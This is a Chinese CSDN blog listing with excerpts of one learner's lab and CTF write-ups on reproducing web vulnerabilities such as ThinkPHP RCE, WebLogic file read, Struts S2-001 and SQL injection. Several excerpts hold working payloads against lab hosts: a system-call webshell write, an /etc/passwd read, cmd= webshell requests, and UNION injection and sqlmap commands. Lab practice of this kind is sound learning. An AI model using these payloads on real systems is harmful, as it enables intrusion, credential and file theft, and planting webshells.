记录笔记-优快云博客

原创 Kali 2022.2安装教程

kali linux 2022.2 详细安装教程

2022-07-08 23:22:51 4770 2

原创 Bugku--CTF-- 1、本地管理员 2、网站被黑

Bugku--CTF--1、本地管理员 2、网站被黑

2022-07-07 19:28:53 1431

原创 VulnHub--mrrobot

Vulnhub靶场--Mr robot 靶机

2022-07-06 09:35:14 965

原创 VulnHub--Lampiao-linux脏牛漏洞提权

vulnhub-靶场--lampiao

2022-07-06 09:17:29 1135 1

【实验目的】学习静态路由的配置，通过实验理解路由器的工作原理。【知识点】路由器的工作原理，静态路由的作用。【实验场景】两台PC处于不同网段，通过两台路由器相连，现在需要实现两台主机可以互相访问。【实验原理】不同主机在进行跨网段通信时，需要依靠路由器的选路。数据到达路由器后，通过查看路由表得知去往目的地址的下一跳、出接口等信息，把数据发送给下一跳即可。对于路由器来说，构建路由表时依靠的是目的地址，也就是路由器只需要了解去往目的时把数据发送给谁，不需要了解整个通信过程都经过了谁。静态路由就是

2022-05-07 19:14:50 142

原创 Bugku--CTF-- GET POST

Bugku--CTF-- GET POST

2022-05-05 15:05:30 499

原创 Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2

Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2二级标题

2022-04-22 14:23:46 1039

原创 docker安装bwapp漏洞实验环境并复现逻辑漏洞中暴力破解实验

docker search bwappdocker pull raesene/bwappdocker imagesdocker run -it -d -p 8080:80 332docker pshttp://192.168.15.136:8080/install.php复现跑出来账号是 bee 密码是 bug暴力破解的原理就是使用攻击者自己的用户名和密码的字典，一个一个去尝试，尝试是否能够登录，未爆破成功原因就是自有的字典里面的没有这个所需要暴力用户名和密码的这个

2022-04-18 15:05:44 2620

原创复现bwapp逻辑漏洞-验证机制问题

2022-04-18 14:56:29 207

原创 Nginx 解析漏洞复现

Nginx 解析漏洞复现该漏洞与Nginx、php版本无关，属于用户配置不当造成的解析漏洞http://192.168.15.136/uploadfiles/nginx.pnghttp://192.168.15.136/uploadfiles/nginx.png/.phphttp://192.168.15.136/123.jpghttp://192.168.15.136/123.jpg/123.php...

2022-04-15 16:39:22 4594

原创 Apache HTTPD 多后缀解析漏洞复现

Apache HTTPD 多后缀解析漏洞复现Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞和apache版本和php版本无关,属于用户配置不当造成的解析漏洞由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别

2022-04-15 16:36:14 2799

原创 Apache SSI 远程命令执行漏洞复现

Apache SSI 远程命令执行漏洞复现如果目标服务器开启了ssi功能，那么shtml文件将可以执行任意命令。如果上传文件程序限制了php文件的上传，且没有限制shtml文件上传，我们可以上传一个shtml文件，并利用语法执行任意命令。...

2022-04-15 16:34:00 119

原创漏洞复现(vulhub漏洞复现) weblogic 文件读取漏洞

weblogic 文件读取漏洞访问http://192.168.15.136:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件GET /hello/file.jsp?path=security/SerializedSystemIni.dat HTTP/1.1是一个二进制文件，所以一定要用burpsuite来读取，用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码，右键copy to file就可以保存成一个文件：

2022-04-13 20:04:10 266

原创漏洞复现(vulhub漏洞复现) （1）weblogic管理控制台未授权远程命令执行漏洞复现 (2) Weblogic SSRF漏洞漏洞复现

weblogic管理控制台未授权远程命令执行漏洞复现Weblogic SSRF漏洞漏洞复现虚拟机同时运行了 redis、Weblogic 两个容器http://192.168.15.136:7001/uddiexplorer/http://192.168.15.136:7001/uddiexplorer/SearchPublicRegistries.jsphttp://192.168.15.136:7001/uddiexplorer/SearchPublicReg

2022-04-13 19:42:40 1243

原创 vulhub Apache HTTPD 多后缀解析漏洞漏洞复现

vulhub Apache HTTPD 多后缀解析漏洞漏洞复现漏洞原理：在有多个后缀的情况下，只要一个文件含有.php后缀的文件即将被识别成PHP文件，没必要是最后一个后缀。利用这个特性，将会造成一个可以绕过上传白名单的解析漏洞。...

2022-04-13 19:29:25 121

原创安装awvs14.7

右击Acunetix Premium Activation Tool.exe 右击管理员权限运行扫描本地机

2022-04-13 19:25:48 1184

原创 vulhub tomcat put方法任意写文件漏洞 tomcat弱口令漏洞

tomcat put方法任意写文件漏洞发送到repeater,修改GET请求为PUTtomcat弱口令漏洞点击shellhttp://192.168.15.131:8080/shell/shell.jsp?cmd=ip%20addr

2022-04-13 19:02:20 628

原创 vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞

vulhub漏洞复现Apache Shiro 1.2.4反序列化漏洞Apache Shiro 认证绕过漏洞shiro反序列化漏洞有何特征？如何防御shiro反序列化漏洞Apache Shiro框架提供了记住我的功能（RememberMe），用户登陆成功后会生成经过加密并编码的cookie，在服务端接收cookie值后，Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥，就可以构造一个恶意对象，对其进行序列化–>AES加密–>Base64编

2022-04-13 18:55:47 1502

原创 phpmyadmin scripts/setup.php 反序列化漏洞 S2-001远程代码执行漏洞复现漏洞要求:

phpmyadmin scripts/setup.phpS2-001远程代码执行漏洞复现漏洞我们在密码处输入:%{2*2}会回显出执行的结果，说明漏洞可能存在%{“tomcatBinDir{”+@java.lang.System@getProperty(“user.dir”)+“}”}%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get(“com.opensymp

2022-04-12 17:02:59 267

原创复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

ThinkPHP5 5.0.23远程代码执行漏洞http://159.75.16.25:8089/index.php?s=captcha会出现如下报错F12进入开发者用HackBar 插件发送 POST 请求得到回显：通过echo命令写入 Webshell 文件首先将一句话木马进行 Base64 编码_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE

2022-04-12 16:58:34 574

原创使用docker搭建sqli-lab环境以及upload-labs环境 xss挑战之旅环境搭建vulhub环境

sqli-lab环境1）查找sqli-lab环境 docker search sqli-labs2）拉取镜像 docker pull acgpiano/sqli-labs3) docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labsupload-labs环境）查找镜像docker search upload-labsxss挑战之旅环境拉取镜像docker search xssdocker pull wushan

2022-04-12 16:45:50 558

原创 510cms使用手工注入挂下一句话木马中国菜刀蚁剑挂马连接510cms网站分别使用navicat和sqlmap进行udf提权

我们知道此处有注入使用order by 确定他的字段值order by 得出字段值是7判断出来回显位数是4

2022-04-12 16:29:13 625

原创 1.只有本地管理员才能访问本页面2.notes Happy Why am lfeeling so happy today? Well ljust got to spend threedays with

只有本地管理员才能访问本页面F12 看看源码没啥东西御剑看看后台也没看出来有啥看了下需要管理员权限在headers里面设置添加一行X-Forwarded-For127.0.0.1flag{sgwxsSesSD232se14sdSVSsx}notesHappyWhy am lfeeling so happy today? Well ljust got to spend threedays with some of my very best friends having fun t

2022-04-12 16:17:28 2806

原创中国红客联盟-，显示的是此网站存在漏洞，请及时修复…

显示的是此网站存在漏洞，请及时修复…登录进去看看先放在御剑里面后台扫下等待扫描结束后，发现有一个shell.php的文件，双击打开试一试这个时候打开的网页显示需要输入密码，先随便输入一个用burp suite 进行爆破，输入密码，打开网页拦截进行抓包选中所输入的密码，右键点击send to Intruder及爆破的页面，点击Intruder的Positions的选项来查看爆破对象点击Payloads选项，在Payload Options的模块里先选择字典然后点击右上角的Start a

2022-04-12 16:03:32 947

原创 Windows操作命令

vm tools 安装出错1.根据报错解决操作系统版本问题2.Windows 远程桌面服务默认使用端口 3389开启远程桌面服务右击计算机-控制面板-高级系统属性-远程设置-远程协助-允许任意版本连接（公网上Windows 服务器不建议开启）需要远程协助机查看自己ip地址 Win+R cmd 命令 ipconfig宿主机远程桌面连接 win+r mstsc 输入目标的IP地址3.ftp服务Windows server 针对服务器防火墙默认关闭 Windows 个

2022-04-12 15:53:24 199

原创 sql注入的方式

二，求列数http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1%27%20order%20by%204%23二分法三、求显示位实际为报错位四、爆数据库版本号id=-1’ union select 1,2,version() – +五、爆当前数据库名id=-1’ union select 1,2,database() --+查询所有数据库 id=-1‘ union select 1,2,group_concat(schema_name) fr

2022-04-11 20:40:15 335

原创 Sqli 的Less-1和less-2

Less-1Sqli-2

2022-04-11 20:37:14 267

原创计算机网络

标识ipPc0主机Server0Pc1Pc2Server1路由器router0Gig0/0Gig0/1路由器Port status 记得启动三层网络配置vlan IP地址

2022-04-11 20:31:53 825

原创路由汇总及默认路由（计算机网络）

标识IP地址配置接口地址PC0 ping 76.12.32.254PC1 ping76.12.69.254PC2 ping192.168.1.254最后尝试三台主机互相ping，均可以ping通

2022-04-11 20:26:40 300

原创 welcome to loading bay control system. please input username to retrieve key 记录下 sqlmap

welcome to loading bay control system. please input username to retrieve key御剑试一下跑出来用户名’or’‘=’列出所有数据库：sqlmap -u “http://xxx” --dbs列出当前数据库：sqlmap -u “http://xxx” --current-db（2）读取表sqlmap -u “http://xxx” -D 库名 --tables（3）读取数据表中的字段名sqlmap -u

2022-04-11 20:20:01 359

原创 sqlmap sqli less-1

python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1”python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -dbspython sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -D security -tablespythonpython sqlmap.py -u “http://192.168.1..

2022-04-11 20:11:28 613

原创 windows下安装sqlmap

SqlMap一款自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术，分别是：1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时

2022-04-11 20:08:50 1115

原创 74cms

将这个74cms的upload目录设置为网站根目录，使用目录扫描工具进行扫描，然后使用burpsuite对后台地址用户名和密码进行爆破。外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vz7TMzdB-1649678567118)(![https://img-blog.csdnimg.cn/fa8e0f36afe149218e3c1549728fe6f1.png)]爆出来用户名admin 密码root...

2022-04-11 20:03:53 590

原创 less-11的注入操作

在火狐浏览器下载foxyproxy 配置好之后打开第十一个题目在burpsuite 右击选择 send repeater 根据题目加一个’尝试一下uname=admin’ and 1=1 --+&passwd=admin&submit=Submituname=admin’ and 1=2 --+&passwd=admin&submit=Submitand 1=2 --+恒为假是，执行错误，发现注入点是基于单引号的字符型注入判断字段uname=admin

2022-04-11 19:59:37 136

原创 Less-32宽字节注入练习

宽字节： GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是ASCII字符(一字节)的现象，即将两个ascii字符误认为是一个宽字节字符。中文、韩文、日文等均存在宽字节，英文默认都是一个字节。在使用PHP连接MySQL的时候，当设置“set character_set_client = gbk”时会导致一个编码转换的问题。例子： id= 1’ 处理 1 \’ 进行编码 1%5c%27 带入sql后 id = \’ a

2022-04-11 19:47:38 201

空空如也

空空如也